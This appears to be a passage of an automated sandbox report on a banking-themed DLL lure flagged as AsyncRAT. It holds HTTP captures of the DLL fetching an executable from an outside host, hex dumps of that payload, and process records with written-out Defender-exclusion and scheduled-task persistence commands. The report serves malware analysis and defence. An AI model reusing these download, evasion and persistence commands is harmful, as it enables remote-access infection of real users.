                                2024-12-10 13:21:42 UTC16384INData Raw: 60 38 2e 2e dc 02 fd b4 9c 25 54 b7 a0 7e 4d ef a3 9d 42 f7 d4 7a 4a bf 3b d2 ab f1 9b af f7 39 c1 a7 2a 12 9f da bf dc 18 93 42 d1 5c a1 b4 92 18 41 fc 43 15 63 26 b7 5d a6 a9 8d 47 82 02 60 68 8d 1b f3 01 40 e9 e7 80 19 89 0a c9 6c 79 2c 81 95 02 97 43 58 1d 51 d3 91 ca f2 24 20 1d 0d 26 b9 3d 03 8c d0 89 b0 c9 4a be bf a0 4a c9 d6 0a 64 88 59 47 ec 85 05 36 f6 86 7b e0 6b 55 18 54 dc a6 63 81 6e 03 51 f3 78 7c 9e 2f c7 42 5f 05 1a a6 f9 63 be 50 e5 c7 d8 38 38 8d 8f 43 34 f8 a6 72 0d be d4 55 8c 1e 44 62 8a 46 d4 aa de 1a 93 1e 83 d9 05 52 65 22 4c 63 d0 cb 39 6a b5 1a 22 7f 20 f9 3c b1 90 95 2f 92 47 31 18 ba 2a 08 18 93 02 b9 72 40 d5 8c c6 51 c1 1d 97 13 9b 22 27 d0 e3 c7 23 36 c5 a1 6e 68 1d 9e 80 2d 27 e7 1d 35 92 2b 74 b2 72 8a 27 36 33 95 ec 83
                                Data Ascii: `8..%T~MBzJ;9*B\ACc&]G`h@ly,CXQ$ &=JJdYG6{kUTcnQx|/B_cP88C4rUDbFRe"Lc9j" </G1*r@Q"'#6nh-'5+tr'63


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.749701163.44.198.574431476C:\Windows\System32\rundll32.exe
                                TimestampBytes transferredDirectionData
                                2024-12-10 13:21:42 UTC111OUTGET /EpWHRWboolCJUXe.exe HTTP/1.1
                                Connection: Keep-Alive
                                Host: 52575815-38-20200406120634.webstarterz.com
                                2024-12-10 13:21:43 UTC252INHTTP/1.1 200 OK
                                Date: Tue, 10 Dec 2024 13:21:42 GMT
                                Server: Apache
                                Last-Modified: Tue, 10 Dec 2024 05:41:54 GMT
                                ETag: "a3a08-628e3f052d239"
                                Accept-Ranges: bytes
                                Content-Length: 670216
                                Connection: close
                                Content-Type: application/x-msdownload
                                2024-12-10 13:21:43 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 8c 4e bc 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fa 09 00 00 08 00 00 00 00 00 00 0e 18 0a 00 00 20 00 00 00 20 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELN0 @ `@
                                2024-12-10 13:21:43 UTC16384INData Raw: 00 03 6f a1 00 00 0a 00 2a 3a 00 02 73 67 00 00 06 28 36 00 00 06 00 2a 0a 00 2a 3a 00 02 73 19 00 00 06 28 36 00 00 06 00 2a 3a 00 02 73 01 00 00 06 28 36 00 00 06 00 2a 3a 00 02 73 56 00 00 06 28 36 00 00 06 00 2a 3a 00 02 73 3f 00 00 06 28 36 00 00 06 00 2a 00 13 30 02 00 2b 00 00 00 04 00 00 11 00 03 2c 0b 02 7b 4e 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 4e 00 00 04 6f 34 00 00 0a 00 00 02 03 28 35 00 00 0a 00 2a 00 13 30 06 00 0d 0e 00 00 07 00 00 11 00 d0 08 00 00 02 28 36 00 00 0a 73 37 00 00 0a 0a 02 73 39 00 00 0a 7d 4f 00 00 04 02 73 3a 00 00 0a 7d 57 00 00 04 02 73 3a 00 00 0a 7d 58 00 00 04 02 73 3a 00 00 0a 7d 59 00 00 04 02 73 3a 00 00 0a 7d 5a 00 00 04 02 73 3a 00 00 0a 7d 5b 00 00 04 02 73 10 00 00 06 7d 5c 00 00 04 02 73 10 00 00
                                Data Ascii: o*:sg(6**:s(6*:s(6*:sV(6*:s?(6*0+,{N+,{No4(5*0(6s7s9}Os:}Ws:}Xs:}Ys:}Zs:}[s}\s
                                2024-12-10 13:21:43 UTC16384INData Raw: 00 0a 00 02 7b 8d 00 00 04 72 2a 1d 00 70 6f 6d 00 00 0a 00 02 7b 8d 00 00 04 72 8e 15 00 70 6f 6e 00 00 0a 00 02 7b 8e 00 00 04 1c 6f 6c 00 00 0a 00 02 7b 8e 00 00 04 72 42 1d 00 70 6f 6d 00 00 0a 00 02 7b 8e 00 00 04 72 b6 15 00 70 6f 6e 00 00 0a 00 02 7b 8e 00 00 04 1f 50 6f 6f 00 00 0a 00 02 22 00 00 c0 40 22 00 00 50 41 73 72 00 00 0a 28 73 00 00 0a 00 02 17 28 74 00 00 0a 00 02 28 ea 00 00 0a 6f 41 00 00 0a 00 02 20 12 04 00 00 20 34 02 00 00 73 4a 00 00 0a 28 75 00 00 0a 00 02 28 42 00 00 0a 02 7b 86 00 00 04 6f 43 00 00 0a 00 02 28 42 00 00 0a 02 7b 81 00 00 04 6f 43 00 00 0a 00 02 28 42 00 00 0a 02 7b 7e 00 00 04 6f 43 00 00 0a 00 02 16 28 76 00 00 0a 00 02 72 54 1d 00 70 28 49 00 00 0a 00 02 1a 28 90 00 00 0a 00 02 72 54 1d 00 70 6f 2c 00 00 0a
                                Data Ascii: {r*pom{rpon{ol{rBpom{rpon{Poo"@"PAsr(s(t(oA 4sJ(u(B{oC(B{oC(B{~oC(vrTp(I(rTpo,
                                2024-12-10 13:21:44 UTC16384INData Raw: 13 01 00 00 04 01 00 00 f1 00 fa 00 84 00 01 00 9d 0f 87 04 01 00 25 04 8b 04 01 00 b0 11 8f 04 01 00 f1 17 93 04 01 00 9e 00 97 04 01 00 ce 00 9b 04 01 00 23 03 9b 04 01 00 97 00 9f 04 01 00 04 1c a3 04 01 00 fd 01 a7 04 01 00 c6 00 a7 04 01 00 5e 01 a7 04 01 00 08 19 ab 04 01 00 61 08 ab 04 01 00 9d 0f 87 04 01 00 25 04 8b 04 01 00 f1 17 93 04 01 00 9e 00 97 04 01 00 15 08 af 04 01 00 97 00 9f 04 06 00 1e 04 9f 04 06 00 8d 11 b3 04 06 00 2d 08 b3 04 06 00 87 0a b3 04 06 00 1c 07 b8 04 01 00 3d 01 9f 04 01 00 88 05 bd 04 01 00 94 05 bd 04 01 00 f1 17 93 04 01 00 9d 0f 87 04 01 00 25 04 8b 04 01 00 b0 11 8f 04 01 00 f1 17 93 04 01 00 a5 12 a3 04 01 00 9e 00 97 04 01 00 23 03 9b 04 01 00 97 00 9f 04 01 00 fd 01 a7 04 01 00 c6 00 a7 04 01 00 5e 01 a7 04 01
                                Data Ascii: %#^a%-=%#^
                                2024-12-10 13:21:44 UTC16384INData Raw: 6c 00 65 00 00 11 34 00 37 00 37 00 33 00 36 00 37 00 36 00 32 00 00 0d 36 00 43 00 36 00 36 00 36 00 33 00 00 29 49 00 6e 00 76 00 65 00 6e 00 74 00 6f 00 72 00 79 00 5f 00 4d 00 61 00 6e 00 61 00 67 00 65 00 6d 00 65 00 6e 00 74 00 00 05 43 00 72 00 00 05 65 00 61 00 00 05 74 00 65 00 00 07 49 00 6e 00 73 00 00 07 74 00 61 00 6e 00 00 05 63 00 65 00 00 21 45 00 78 00 69 00 74 00 20 00 41 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00 69 00 6f 00 6e 00 00 7d 53 00 65 00 6c 00 65 00 63 00 74 00 20 00 2a 00 20 00 66 00 72 00 6f 00 6d 00 20 00 74 00 62 00 6c 00 55 00 73 00 65 00 72 00 73 00 20 00 77 00 68 00 65 00 72 00 65 00 20 00 75 00 73 00 65 00 72 00 6e 00 61 00 6d 00 65 00 3d 00 40 00 75 00 73 00 65 00 72 00 20 00 61 00 6e 00 64 00 20 00 70 00 61 00 73
                                Data Ascii: le477367626C6663)Inventory_ManagementCreateInstance!Exit Application}Select * from tblUsers where username=@user and pas
                                2024-12-10 13:21:44 UTC16384INData Raw: 4a 79 ad a0 97 4d a1 e8 25 cb 50 cb e0 36 34 2b 3f 80 5e a2 d7 5f 63 dc 66 ba 9d f4 b2 a9 d7 e8 99 d1 cb 50 8d 1c ee a4 7d bb 8d d6 c3 6c 4e f4 7e 62 c8 5b 4d cf 64 e7 21 36 37 fa 4b 69 6b 5f 53 05 77 31 39 de 41 df d8 83 f6 42 5d 74 52 ed 8a 6b 75 a9 bd 58 77 81 4d 54 47 b3 58 4d 00 b3 87 d6 be a3 b5 c1 32 b4 8d 79 0f 5a 4f af 23 fd 53 8d 7e 7e 0e 2d 4f b5 b2 d3 a2 68 07 36 33 c1 cc 66 7f 00 01 18 3a a8 d7 c3 d2 fe 00 00 00 00 49 45 4e 44 ae 42 60 82 0b 00 00 00 9a 03 00 00 ce ca ef be 01 00 00 00 91 00 00 00 6c 53 79 73 74 65 6d 2e 52 65 73 6f 75 72 63 65 73 2e 52 65 73 6f 75 72 63 65 52 65 61 64 65 72 2c 20 6d 73 63 6f 72 6c 69 62 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69
                                Data Ascii: JyM%P64+?^_cfP}lN~b[Md!67Kik_Sw19AB]tRkuXwMTGXM2yZO#S~~-Oh63f:IENDB`lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, Publi
                                2024-12-10 13:21:44 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii:
                                2024-12-10 13:21:44 UTC16384INData Raw: cc f0 ab 6d 4c 77 70 54 8a 2b 8b ba 84 4a 26 33 45 d1 86 f2 46 9a 34 7e 87 9d 34 2a 8f e1 2a 45 68 68 8e 0c b1 75 ee a3 36 da 15 77 95 4a 74 1a b5 d9 48 4b dd 2d 68 8c b6 f6 5d e5 92 9c c7 dc a8 57 4a d8 26 ad a3 59 7a e3 c6 c3 bf d1 fb 09 d7 c8 d8 7e e1 28 3a e5 26 5c 63 63 ba 86 ce 51 f7 69 e3 d8 35 38 86 27 98 fb 80 d7 65 0f 4a 79 ad a0 97 4d a1 e8 25 cb 50 cb e0 36 34 2b 3f 80 5e a2 d7 5f 63 dc 66 ba 9d f4 b2 a9 d7 e8 99 d1 cb 50 8d 1c ee a4 7d bb 8d d6 c3 6c 4e f4 7e 62 c8 5b 4d cf 64 e7 21 36 37 fa 4b 69 6b 5f 53 05 77 31 39 de 41 df d8 83 f6 42 5d 74 52 ed 8a 6b 75 a9 bd 58 77 81 4d 54 47 b3 58 4d 00 b3 87 d6 be a3 b5 c1 32 b4 8d 79 0f 5a 4f af 23 fd 53 8d 7e 7e 0e 2d 4f b5 b2 d3 a2 68 07 36 33 c1 cc 66 7f 00 01 18 3a a8 d7 c3 d2 fe 00 00 00 00 49
                                Data Ascii: mLwpT+J&3EF4~4**Ehhu6wJtHK-h]WJ&Yz~(:&\ccQi58'eJyM%P64+?^_cfP}lN~b[Md!67Kik_Sw19AB]tRkuXwMTGXM2yZO#S~~-Oh63f:I
                                2024-12-10 13:21:44 UTC16384INData Raw: 0b c4 20 2a b0 05 bc 63 46 08 fa 0e 52 25 2d 78 c2 08 f2 95 a0 a1 9b 91 ff 13 f0 20 a0 e8 4a b4 9a 98 c8 61 90 2b 55 b7 07 b3 dc 97 11 35 c7 10 07 9c 67 44 10 fb da b2 9f 00 6b 60 02 c5 3c ff 00 03 33 cd 5a f9 49 3c ff 86 00 46 0c be 9d 33 b1 57 29 59 4e a0 d2 e0 fe 5f c9 b3 30 e3 b9 83 cf 0b 59 b9 2f 2a b1 05 86 33 f7 a5 20 2b 37 bb 72 a0 71 67 f8 4a 0c cc 99 32 4a 0e 44 dd 9a ac d0 8f a2 f4 14 93 76 50 e6 46 54 9a 7c fd 38 fe 8e dc 57 86 19 9e 0a b3 5b 6e 51 a0 2b 1f 20 45 bf b2 f9 82 bf 53 31 58 de c5 20 4a 61 46 65 c0 f8 db ec 66 d6 d3 f5 6e 02 33 83 c1 f5 4e 6f ab 9f cd 41 06 93 3d be 1e b1 6c 7c 0d c7 1a 80 ff 4a 69 4d 4f 13 3b 92 67 a1 c0 6a 06 3c 88 2c 0a e3 34 58 39 06 83 32 92 c9 c1 7c 04 59 89 3a 34 c7 95 97 15 30 24 3b 4f 34 75 ab 80 a1 f1 5f
                                Data Ascii: *cFR%-x Ja+U5gDk`<3ZI<F3W)YN_0Y/*3 +7rqgJ2JDvPFT|8W[nQ+ ES1X JaFefn3NoA=l|JiMO;gj<,4X92|Y:40$;O4u_
                                2024-12-10 13:21:45 UTC16384INData Raw: 60 38 2e 2e dc 02 fd b4 9c 25 54 b7 a0 7e 4d ef a3 9d 42 f7 d4 7a 4a bf 3b d2 ab f1 9b af f7 39 c1 a7 2a 12 9f da bf dc 18 93 42 d1 5c a1 b4 92 18 41 fc 43 15 63 26 b7 5d a6 a9 8d 47 82 02 60 68 8d 1b f3 01 40 e9 e7 80 19 89 0a c9 6c 79 2c 81 95 02 97 43 58 1d 51 d3 91 ca f2 24 20 1d 0d 26 b9 3d 03 8c d0 89 b0 c9 4a be bf a0 4a c9 d6 0a 64 88 59 47 ec 85 05 36 f6 86 7b e0 6b 55 18 54 dc a6 63 81 6e 03 51 f3 78 7c 9e 2f c7 42 5f 05 1a a6 f9 63 be 50 e5 c7 d8 38 38 8d 8f 43 34 f8 a6 72 0d be d4 55 8c 1e 44 62 8a 46 d4 aa de 1a 93 1e 83 d9 05 52 65 22 4c 63 d0 cb 39 6a b5 1a 22 7f 20 f9 3c b1 90 95 2f 92 47 31 18 ba 2a 08 18 93 02 b9 72 40 d5 8c c6 51 c1 1d 97 13 9b 22 27 d0 e3 c7 23 36 c5 a1 6e 68 1d 9e 80 2d 27 e7 1d 35 92 2b 74 b2 72 8a 27 36 33 95 ec 83
                                Data Ascii: `8..%T~MBzJ;9*B\ACc&]G`h@ly,CXQ$ &=JJdYG6{kUTcnQx|/B_cP88C4rUDbFRe"Lc9j" </G1*r@Q"'#6nh-'5+tr'63


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:1
                                Start time:08:21:35
                                Start date:10/12/2024
                                Path:C:\Windows\System32\loaddll64.exe
                                Wow64 process (32bit):false
                                Commandline:loaddll64.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll"
                                Imagebase:0x7ff6cab30000
                                File size:165'888 bytes
                                MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:2
                                Start time:08:21:35
                                Start date:10/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:3
                                Start time:08:21:35
                                Start date:10/12/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",#1
                                Imagebase:0x7ff779b70000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:4
                                Start time:08:21:35
                                Start date:10/12/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll,xlAutoOpen
                                Imagebase:0x7ff7c8270000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:5
                                Start time:08:21:35
                                Start date:10/12/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",#1
                                Imagebase:0x7ff7c8270000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:11
                                Start time:08:21:38
                                Start date:10/12/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",xlAutoOpen
                                Imagebase:0x7ff7c8270000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:13
                                Start time:08:21:44
                                Start date:10/12/2024
                                Path:C:\Users\user\AppData\Roaming\regasms.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\regasms.exe
                                Imagebase:0x350000
                                File size:670'216 bytes
                                MD5 hash:AE806B6F5E02484C2BE2B49DA35B3D26
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000D.00000002.1403401343.0000000002827000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 26%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:15
                                Start time:08:21:47
                                Start date:10/12/2024
                                Path:C:\Users\user\AppData\Roaming\regasms.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\regasms.exe
                                Imagebase:0xd60000
                                File size:670'216 bytes
                                MD5 hash:AE806B6F5E02484C2BE2B49DA35B3D26
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000002.1440771055.0000000003217000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:16
                                Start time:08:21:47
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                                Imagebase:0x3a0000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:17
                                Start time:08:21:47
                                Start date:10/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:18
                                Start time:08:21:47
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp"
                                Imagebase:0x970000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:19
                                Start time:08:21:47
                                Start date:10/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:20
                                Start time:08:21:48
                                Start date:10/12/2024
                                Path:C:\Users\user\AppData\Roaming\regasms.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\regasms.exe"
                                Imagebase:0x670000
                                File size:670'216 bytes
                                MD5 hash:AE806B6F5E02484C2BE2B49DA35B3D26
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000014.00000002.1519769182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                Has exited:true

                                General

                                Target ID:21
                                Start time:08:21:50
                                Start date:10/12/2024
                                Path:C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe
                                Imagebase:0x3d0000
                                File size:670'216 bytes
                                MD5 hash:AE806B6F5E02484C2BE2B49DA35B3D26
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 26%, ReversingLabs
                                Has exited:true

                                General

                                Target ID:22
                                Start time:08:21:51
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                                Imagebase:0x3a0000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:23
                                Start time:08:21:51
                                Start date:10/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:25
                                Start time:08:21:51
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp2042.tmp"
                                Imagebase:0x970000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:26
                                Start time:08:21:51
                                Start date:10/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:27
                                Start time:08:21:51
                                Start date:10/12/2024
                                Path:C:\Users\user\AppData\Roaming\regasms.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\regasms.exe"
                                Imagebase:0xdc0000
                                File size:670'216 bytes
                                MD5 hash:AE806B6F5E02484C2BE2B49DA35B3D26
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                General

                                Target ID:28
                                Start time:08:21:51
                                Start date:10/12/2024
                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Imagebase:0x7ff7fb730000
                                File size:496'640 bytes
                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                Has elevated privileges:true
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:29
                                Start time:09:29:12
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp9EF.tmp"
                                Imagebase:0x970000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:30
                                Start time:09:29:12
                                Start date:10/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:31
                                Start time:09:29:12
                                Start date:10/12/2024
                                Path:C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                                Imagebase:0x70000
                                File size:670'216 bytes
                                MD5 hash:AE806B6F5E02484C2BE2B49DA35B3D26
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:32
                                Start time:09:29:12
                                Start date:10/12/2024
                                Path:C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                                Imagebase:0x7d0000
                                File size:670'216 bytes
                                MD5 hash:AE806B6F5E02484C2BE2B49DA35B3D26
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:33
                                Start time:09:29:13
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit
                                Imagebase:0x410000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:34
                                Start time:09:29:13
                                Start date:10/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
